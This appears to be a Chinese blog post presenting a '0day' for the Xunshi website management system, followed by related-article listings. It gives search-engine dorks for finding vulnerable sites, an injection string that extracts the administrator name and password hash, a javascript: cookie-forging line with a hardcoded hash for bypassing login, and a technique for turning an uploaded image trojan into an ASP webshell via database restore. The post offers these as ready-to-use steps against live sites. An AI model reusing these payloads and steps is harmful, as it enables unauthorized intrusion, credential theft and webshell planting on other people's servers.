讯时网站管理系统通杀0DAY漏洞

最新推荐文章于 2012-11-15 22:44:00 发布
最新推荐文章于 2012-11-15 22:44:00 发布
阅读量5.8k 收藏
点赞数
分类专栏: 网络安全 文章标签: javascript 破解 cookies 数据库 asp user
本文介绍了一种通过特定URL路径获取后台管理员权限的方法,并演示了如何利用这些信息登录后台系统及进行进一步操作。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 在谷歌搜索 inurl: admin/admin_news_pl_view.asp    打开搜索到的网址或者输入 inurl:news_more.asp?lm2= 

 然后修改成 admin/admin_news_pl_view.asp?id=1 或者 admin/admin_news_pl_view.asp?id=2 或者 admin/admin_news_pl_view.asp?id=3

只要显示错误就一直打3,4,5......
找到管理员和32位MDB密码后破解MDB密码,然后进后台  admin/admin_index.asp 输入破解好的用户名和密码直接进系统


另外还可以这样子进后台:

|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='             // 得到管理员用户和MD5密码
cookies进后台
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));

在系统里面有上传图片的功能,上传后,再用备份恢复数据库的功能来恢复上传好的JPG木马成 ASP格式,搞定。

00M
关注
专栏目录
CMS网站管理系统
01-10
网站管理系统,国内优秀的CMS之一,基于ASP+ACCESS
网站管理系统(ACCESS) 5.0
03-14
网站管理系统(ACCESS) 5.0
新闻系统漏洞
11-15 222
这套系统有N年版,一般的政府、学校和企事业单位用得多,特证: 显示新闻News_View.asp?NewsID= 登陆login.asp?id=3,最主要的特证是用的一个有一个EDIT目录,下面的数据库是用的db/#ewebeditor.asp以上特证只要中二个就基本可以肯定是这套系统漏洞:这套系统原来有N多漏洞,但经过改进,现在主要的问题是COOKIES注入和列目录问题具体的代码我就讲...
网站管理系统 5.0.rar
05-25
网站管理系统是一款界面清爽、操作体验极好的ASP网站管理系统,而且免费开源,尤其是这套系统的新闻部分非常深受各位站长的喜爱,使用,这个CMS系统的首页需要你自己设计一个模板,然后由后台设置后进行JS调用。因此后台的功能比较完备,大家可以看截图。 网站管理系统 5.0 较上一版本改动: 1、解决部分页面乱码现象; 2、修复了文章正文页面有打开缓慢的现象; 3、录入员和审核员可以更换,而不用删除重建新用户号; 4、后台删除文章将会进入回收站,而不是永久删除; 5、修复了IE浏览器中,文章列表分隔线变粗的BUG; 6、后台添加显示了当前登录用户信息; 7、修复了后台部分页面出来缓慢的现象; 8、修复了其它细节问题。 登录后台请打开login.asp。默认用户名和密码:admin。 主要特点: 1、网站管理系统CMS系统永久免费,绝不过期! 2、本新闻系统采用ASP ACCESS数据库,对一般服务器空间都支持良好。 3、框架(iframe)和JS两种调用新闻和图片新闻,以及图片新闻的自定义横排和竖排。 4、强大的后台文章编辑器的功能。可方便地用拖动的方式进行图文混排、图片远程上传、上传图片显示效果处理等操作,以及"从word中粘贴"功能,能全部清除word排版格式多余代码。 5、自由编辑(HTML)栏目模版,可设置多个模版。 6、可自由增删修改栏目以及设置此栏目模版 7、新闻/图片代码调用在后台生成。 8、三级栏目生成和管理。可调用一级栏目下面的所有二级栏目,也可以调用单独的二级栏目。 9、可增加多个低权限的录入员。增加新闻会记录新闻的增加录入员是谁。 10、新闻自由设置固顶或推荐,自由更改新闻标题的颜色,可独立设置某条新闻的URL转向。 11、新闻评论功能,可在后台自由查看评论、相关新闻、IP信息和删除。 12、数据库的压缩、备份和恢复。 13、网友可以投稿,由最高管理员在后台审查,可控制是否使用HTML编辑器。 14、投票、留言、网站公告功能的支持! 为大家满足整站的融合一体化的管理。 15、可进行IP地址阻止设置,防止恶意人员破坏。 16、支持RSS读取新闻。 17、支持产品展示以及在线支付购买。
三顾--对新闻发布系统的艰难突破
11-15 176
作者:月无痕&&花非花来源:红狼安全小组(www.wolfexp.net,www.crst.com.cn)注:本文以发表于黑客手册,转载请加上出处 一.接触起因 这几天事情较多,一直都没去老大的论坛转!今天好友joli突然Q我说论坛上有人发了个脚本的问题,叫我也一起看一下,于是我就跑过去看了下(你家离论坛很近?竟然可以跑着过去!),也就有了下面这篇文章(测试版本为...
网站管理系统4.9免费版
07-19
网站管理系统4.9免费版】是一个专为用户提供的免费网站管理解决方案,它集成了多种功能,帮助用户高效地构建和维护自己的网站。这个系统的核心在于提供了一个易用的后台界面,允许用户轻松地进行内容发布、...
网站管理系统4.0无前台版
03-25
永远免费的《网站管理系统4.0》CMS 较上一版本改动: 1、解决了文章列表有不会显示子栏目中文章的BUG。 2、非管理员权限登录后台,隐藏了一些调用代码。 3、解决了文章编辑插入分页符无效的BUG。 修复了其它...
网站管理系统3.3
03-24
1、本新闻系统永久免费,绝不过期! 2、本新闻系统采用ASP+ACCESS数据库,对一般服务器空间都支持良好。 3、框架(iframe)和JS两种调用新闻和图片新闻,以及图片新闻的自定义横排和竖排。 4、强大的后台文章编辑器的...
网站标准管理系统教程.doc
12-16
网站标准管理系统教程】 网站标准管理系统是一款针对初学者友好的网站管理工具,其教程主要涵盖“模板”、“标签”和“栏目”这三个核心概念。在使用进行网站搭建,理解这些概念及其相互关系至关...
网站后台管理系统(适合于绝大多数网站使用)
09-21
网站后台管理系统(适合于绝大多数网站使用)
网站管理系统 v5.0.zip
07-05
网站管理系统一款界面清爽、操作体验极好的ASP网站管理系统,而且免费开源,尤其是这套系统的新闻部分非常深受各位站长的喜爱,使用,这个CMS系统的首页需要你自己设计一个模板,然后由后台设置后进行JS调用。因此后台的功能比较完备,大家可以看截图。   网站管理系统特性: 1、本新闻系统永久免费,绝不过期! 2、本新闻系统采用ASP ACCESS数据库,对一般服务器空间都支持良好。 3、框架(iframe)和JS两种调用新闻和图片新闻,以及图片新闻的自定义横排和竖排。 4、强大的后台文章编辑器的功能。可方便地用拖动的方式进行图文混排、图片远程上传、上传图片显示效果处理等操作,以及"从word中粘贴"功能,能全部清除word排版格式多余代码。 5、自由编辑(HTML)栏目模版,可设置多个模版。 6、可自由增删修改栏目以及设置此栏目模版 7、新闻/图片代码调用在后台生成。 8、三级栏目生成和管理。可调用一级栏目下面的所有二级栏目,也可以调用单独的二级栏目。 9、可增加多个低权限的录入员。增加新闻会记录新闻的增加录入员是谁。 10、新闻自由设置固顶或推荐,自由更改新闻标题的颜色,可独立设置某条新闻的URL转向。 11、新闻评论功能,可在后台自由查看评论、相关新闻、IP信息和删除。 12、数据库的压缩、备份和恢复。 13、网友可以投稿,由最高管理员在后台审查,可控制是否使用HTML编辑器。 14、投票、留言、网站公告功能的支持! 为大家满足整站的融合一体化的管理。 15、可进行IP地址阻止设置,防止恶意人员破坏。 16、支持RSS读取新闻。 17、支持产品展示以及在线支付购买。   网站管理系统 v5.0 更新记录 1、解决部分页面乱码现象; 2、修复了文章正文页面有打开缓慢的现象; 3、录入员和审核员可以更换,而不用删除重建新用户号; 4、后台删除文章将会进入回收站,而不是永久删除; 5、修复了IE浏览器中,文章列表分隔线变粗的BUG; 6、后台添加显示了当前登录用户信息; 7、修复了后台部分页面出来缓慢的现象; 修复了其它细节问题。 登录后台请打开 login.asp 。默认用户名和密码:admin
CMS网站内容管理系统 v4.3版
03-17
较上一版本改动: 1、幻灯片调用增加到前七张,如果不足七张,则按实际图片数量自动循环,不会再以空白图片循环。 2、为了安全,xml-BaiDu.xml文件改放在html目录中了,可以将系统根目录可写权限关闭了。但CAIJI、HTML这两个目录可写、可修改权限必须打开。 3、解决因文章热点效问题,导致JS调用不显示新闻的问题。 4、留言的JS调用增加了行距,可调整留言标题的行距。 5、后台文章编辑,增加标题粗体、斜体的勾选项。 6、搜索结果显示样式改用了仿照百度搜索结果。 7、修复了2处重要的安全漏洞。   升级到新版详见说明文件.htm
网站管理系统CMS ACCESS版 最新4.2版
06-23
网站管理系统最新4.2 ACCESS版
新闻文章管理系统_v2.60
03-26
后台默认管理用户及密码均为:admin 1、本新闻系统永久免费,绝不过期! 2、本新闻系统采用ASP+ACCESS数据库,对一般服务器空间都支持良好。 3、框架(iframe)和JS两种调用新闻和图片新闻,以及图片新闻的自定义横排和竖排。 4、强大的后台文章编辑器的功能。可方便地用拖动的方式进行图文混排、图片远程上传、上传图片显示效果处理等操作,以及'从word中粘贴'功能,能全部清除word排版格式多余代码。 5、自由编辑(HTML)栏目模版,可设置多个模版。 6、可自由增删修改栏目以及设置此栏目模版 7、新闻/图片代码调用在后台生成。 8、三级栏目生成和管理。可调用一级栏目下面的所有二级栏目,也可以调用单独的二级栏目。 9、可增加多个低权限的录入员。增加新闻会记录新闻的增加录入员是谁。 10、新闻自由设置固顶或推荐,自由更改新闻标题的颜色,可独立设置某条新闻的URL转向。 11、新闻评论功能,可在后台自由查看评论、相关新闻、IP信息和删除。 12、数据库的压缩、备份和恢复。 13、网友可以投稿,由最高管理员在后台审查,可控制是否使用HTML编辑器。 14、投票、留言、网站公告功能的支持!为大家满足整站的融合一体化的管理。 15、可进行IP地址阻止设置,防止恶意人员破坏。 较v2.50版本改动: 1、修复了退出后台管理系统后,再点击IE的后退,到管理平台,仍然可以再操作。 2、修补了专题更多列表页面,点击下一页就出错的问题。 3、修复了友情链接调用,类型为3、4、5、6、7、8无法显示的问题 4、修复了当设置中新闻栏目模版设置中显示栏目名称,但新闻更多列表中没有显 示的问题。 5、修复了留言内容不能回车断行的问题。 6、修复了搜索页面,整段变黄背景的问题。 7、增加了专题文章的JS调用代码。请参看后台管理专题页面。 8、头条新闻调用代码中,增加了分栏目调用的参数。 9、后台管理中,增加批量删除新闻的功能。
网站管理系统教程.doc
最新发布
04-23
在阅读了《网站管理系统教程》的内容后,我们可以提炼出一系列关键知识点,以帮助初学者更好地理解和应用网站管理系统。以下是关于网站管理系统的详细知识点总结: 1. 网站管理系统概念:网站管理...
新闻系统再探
11-15 139
今天学习网络渗透,到网上寻找一下猎物。找到一个学校的网站,我一看http://www.test.com/xsnews/News_View.asp?NewsID=249这样的网址,知道又碰到新闻系统了,学校用这个系统的还真不少。前几次用以前的漏洞,进去过,但是对那些太老的漏洞都已经打了补丁。这次我还是用那三板斧都试了已通,未果。我想起来有篇文章叫《三顾--对新闻发布...
发现CMS4.5的几个问题
weixin_34112900的博客
08-09 194
为什么80%的码农都做不了架构师?>>> ...
新闻文章管理系统 v3.0(源码)
11-15
简要介绍:<br>1、本新闻系统永久免费,绝不过期!<br>2、本新闻系统采用ASP+ACCESS数据库,对一般服务器空间都支持良好。<br>3、框架(iframe)和JS两种调用新闻和图片新闻,以及图片新闻的自定义横排和竖排。<br>4、强大的后台文章编辑器的功能。可方便地用拖动的方式进行图文混排、图片远程上传、上传图片显示效果处理等操作,以及"从word中粘贴"功能,能全部清除word排版格式多余代码。<br>5、自由编辑(HTML)栏目模版,可设置多个模版。<br>6、可自由增删修改栏目以及设置此栏目模版<br>7、新闻/图片代码调用在后台生成。<br>8、三级栏目生成和管理。可调用一级栏目下面的所有二级栏目,也可以调用单独的二级栏目。<br>9、可增加多个低权限的录入员。增加新闻会记录新闻的增加录入员是谁。<br>10、新闻自由设置固顶或推荐,自由更改新闻标题的颜色,可独立设置某条新闻的URL转向。<br>11、新闻评论功能,可在后台自由查看评论、相关新闻、IP信息和删除。<br>12、数据库的压缩、备份和恢复。<br>13、网友可以投稿,由最高管理员在后台审查,可控制是否使用HTML编辑器。<br>14、投票、留言、网站公告功能的支持! 为大家满足整站的融合一体化的管理。<br>15、可进行IP地址阻止设置,防止恶意人员破坏。 <br>16、支持RSS读取新闻。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值